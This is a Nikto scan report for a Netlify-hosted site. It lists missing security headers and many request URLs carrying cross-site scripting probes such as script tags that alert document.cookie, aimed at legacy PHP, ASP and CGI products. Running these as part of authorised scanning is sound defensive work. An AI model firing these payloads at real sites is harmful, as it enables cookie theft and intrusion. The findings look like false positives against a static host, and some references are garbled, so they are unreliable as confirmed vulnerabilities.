Scan report for "trendingrd.netlify.app"
Summary
Found
205
Duration
1min 1sec
Date
2026-03-04
IP
18.208.88.157
Report
Nikto scan (max 60 sec) (nikto -host trendingrd.netlify.app -maxtime 60)
- Nikto v2.6.0
---------------------------------------------------------------------------
+ Your Nikto installation is out of date.
+ Target IP: 18.208.88.157
+ Target Hostname: trendingrd.netlify.app
+ Target Port: 80
+ Platform: Unknown
+ Start Time: 2026-03-04 12:04:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: Netlify
+ Multiple IPs found: 18.208.88.157, 98.84.224.111, 2600:1f18:16e:df01::259, 2600:1f18:16e:df01::258
+ No CGI Directories found (use '-C all' to force check all possible dirs). CGI tests skipped.
+ [013587] /: Suggested security header missing: permissions-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy
+ [013587] /: Suggested security header missing: strict-transport-security. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
+ [013587] /: Suggested security header missing: x-content-type-options. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options
+ [013587] /: Suggested security header missing: content-security-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
+ [013587] /: Suggested security header missing: referrer-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy
+ [000702] /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000703] /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS).
+ [000704] /emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000705] /emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000706] /emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000707] /administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).
+ [000708] /administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000709] /administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000710] /administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000711] /administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000712] /administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1204
+ [000714] /https-admserv/bin/index?/<script>alert(document.cookie)</script>: Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
+ [000715] /clusterframe.jsp?cluster=<script>alert(document.cookie)</script>: Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ [000717] /upload.php?type=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS).
+ [000718] /soinfo.php?\"><script>alert('Vulnerable')</script>: The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1954
+ [000725] /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>: NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS).
+ [000730] /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>: The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message.
+ [000734] /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>: Site Server is vulnerable to Cross Site Scripting.
+ [000735] /_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>: Site Server is vulnerable to Cross Site Scripting.
+ [000741] /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>: Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS).
+ [000776] /user.php?op=userinfo&uname=<script>alert('hi');</script>: The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1.
+ [000777] /user.php?op=confirmnewuser&module=NS-NewUser&uNikto=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).
+ [000780] /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>: MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS).
+ [000782] /supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0931
+ [000783] /supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0931
+ [000784] /supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script>: MyHelpdesk versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0931
+ [000785] /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page.
+ [000786] /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview: This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1524
+ [000787] /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1732
+ [000790] /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P: CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0938
+ [000793] /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>: Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page.
+ [000797] /search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0614
+ [000798] /search.php?searchfor=\"><script>alert(1776)</script>: Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). See: https://web.archive.org/web/20200228105003/https://www.securityfocus.com/archive/1/315554
+ [000799] /search.asp?term=<%00script>alert('Vulnerable')</script>: ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this).
+ [000801] /samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND: Sambar Server default script is vulnerable to Cross Site Scripting (XSS).
+ [000802] /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>: This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSS).
+ [000804] /postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft+Utilities\"%3<script>alert('Vulnerable')</script>: Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS).
+ [000806] /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). See: https://www.exploit-db.com/exploits/28589
+ [000809] /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).
+ [000810] /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).
+ [000811] /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).
+ [000812] /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>: phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS).
+ [000814] /phptonuke.php?filnavn=<script>alert('Vulnerable')</script>: PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1995
+ [000816] /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1287
+ [000817] /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>: Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1287
+ [000820] /phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>: phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0484
+ [000821] /phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>: phpBB is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0484
+ [000822] /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3392
+ [000823] /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>: Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). See: OSVhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-339244
+ [000826] /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>: Vignette server is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.
+ [000830] /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>: Sambar Server before 6.0 beta 6 default script is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1285
+ [000831] /nav/cList.php?root=</script><script>alert('Vulnerable')/<script>: RaQ3 server script is vulnerable to Cross Site Scripting (XSS).
+ [000836] /myhome.php?action=messages&box=<script>alert('Vulnerable')</script>: OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS).
+ [000837] /msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS).
+ [000838] /msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS).
+ [000839] /msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>: The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS).
+ [000840] /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>: Basit CMS 1.0 is vulnerable to Cross Site Scripting (XSS). See: https://www.exploit-db.com/exploits/22383
+ [000841] /modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).
+ [000842] /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).
+ [000843] /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).
+ [000844] /modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>: PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS).
+ [000845] /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>: The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS).
+ [000846] /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2: The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS).
+ [000847] /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>: Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1070
+ [000848] /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).
+ [000849] /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).
+ [000850] /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>: This install of PHP-Nuke's modules.php is vulnerable to Cross Site Scripting (XSS).
+ [000851] /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).
+ [000853] /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>: The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1523
+ [000855] /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>: Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS).
+ [000856] /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).
+ [000857] /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).
+ [000858] /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2020
+ [000859] /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2020
+ [000860] /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>: This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1524
+ [000861] /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>: The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS).
+ [000864] /megabook/admin.cgi?login=<script>alert('Vulnerable')</script>: Megabook guestbook is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/fulldisclosure/2003/Jun/886
+ [000868] /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>: NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0504
+ [000869] /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>: NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0504
+ [000872] /isapi/testisa.dll?check1=<script>alert(document.cookie)</script>: Sambar Server 6.0 beta 6 default script is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1285
+ [000874] /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS).
+ [000876] /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page.
+ [000877] /index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script>: MiniBB is vulnerable to Cross Site Scripting (XSS). See: http://www.minibb.net
+ [000879] /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS).
+ [000880] /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS).
+ [000882] /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS).
+ [000883] /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>: myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS).
+ [000884] /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS).
+ [000886] /gallery/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0614
+ [000887] /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>: This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1524
+ [000890] /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>: YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6133,https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1845
+ [000893] /error/500error.jsp?et=1<script>alert('Vulnerable')</script>;: Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1027
+ [000897] /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>: This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.
+ [000901] /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview: This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.
+ [000902] /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>: RSA ClearTrust allows Cross Site Scripting (XSS). See: https://www.exploit-db.com/exploits/22357
+ [000905] /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). See: https://vulners.com/osvdb/OSVDB:651
+ [000906] /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>: This CGI is vulnerable to Cross Site Scripting (XSS). See: https://vulners.com/osvdb/OSVDB:651
+ [000909] /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05: DCP-Portal v5.3.1 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1536
+ [000910] /ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1732
+ [000911] /ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f: Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1732
+ [000914] /article.cfm?id=1'<script>alert(document.cookie);</script>: With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS).
+ [000915] /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>: Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). See: https://www.mail-archive.com/bugtraq@securityfocus.com/msg11627.html
+ [000918] /addressbook/index.php?surname=<script>alert('Vulnerable')</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0504
+ [000919] /addressbook/index.php?name=<script>alert('Vulnerable')</script>: Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0504
+ [000920] /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>: Admanager 1.1 is vulnerable to Cross Site Scripting (XSS). See: https://seclists.org/vuln-dev/2002/Apr/270
+ [000921] /a?<script>alert('Vulnerable')</script>: Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.
+ [000923] /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1243
+ [001210] /mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;: Mailman is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0855
+ [001211] /mail/addressaction.html?id=<USERID#>&newaddress=1&addressNikto=<script>alert('Vulnerable')</script>&addressemail=YovbM@example.com: IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1899
+ [001223] /affich.php?image=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2397
+ [001224] /diapo.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2397
+ [001225] /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2397
+ [001227] /fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). See: https://vulners.com/nessus/FCGI_ECHO.NASL
+ [001228] /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). See: https://vulners.com/nessus/FCGI_ECHO.NASL
+ [001229] /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). See: https://vulners.com/nessus/FCGI_ECHO.NASL
+ [001230] /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>: Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). See: https://vulners.com/nessus/FCGI_ECHO.NASL
+ [001240] /ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>: Sun Answerbook is vulnerable to XSS in the search field. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0548
+ [001241] /apps/web/index.fcgi?servers=§ion=<script>alert(document.cookie)</script>: Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1785
+ [001378] /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2467
+ [001379] /forgot_password.php?email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2467
+ [001380] /bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2467
+ [001381] /bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2467
+ [001382] /eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2467
+ [001383] /eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2467
+ [001456] /login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). See: https://www.exploit-db.com/exploits/22762
+ [001457] /login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). See: https://www.exploit-db.com/exploits/22762
+ [001458] /SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). See: https://www.exploit-db.com/exploits/22762
+ [001459] /SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). See: https://www.exploit-db.com/exploits/22762
+ [001487] /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1175
+ [001503] /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>: VP-ASP prior to 4.50 are vulnerable to XSS attacks. See: https://seclists.org/bugtraq/2004/Jun/210
+ [001504] /shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>: VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS. See: https://seclists.org/bugtraq/2004/Jun/210
+ [001510] /showmail.pl?Folder=<script>alert(document.cookie)</script>: @Mail WebMail 3.52 contains an XSS in the showmail.pl file. See: OSVDB-2950
+ [003016] /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>: Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). See: OSVDB-3280
+ [003030] /firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz: Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages. See: https://securitytracker.com/id/1008158
+ [003031] /firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>: Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages. See: https://securitytracker.com/id/1008158
+ [003032] /antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0: Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages. See: OSVDB-3295
+ [003033] /antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally): Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages. See: OSVDB-3295
+ [003035] /theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session: Fortigate firewall 2.50 and prior contains several XSS vulnerabilities in various administrative pages. See: OSVDB-3296
+ [003081] /examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>: BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0624
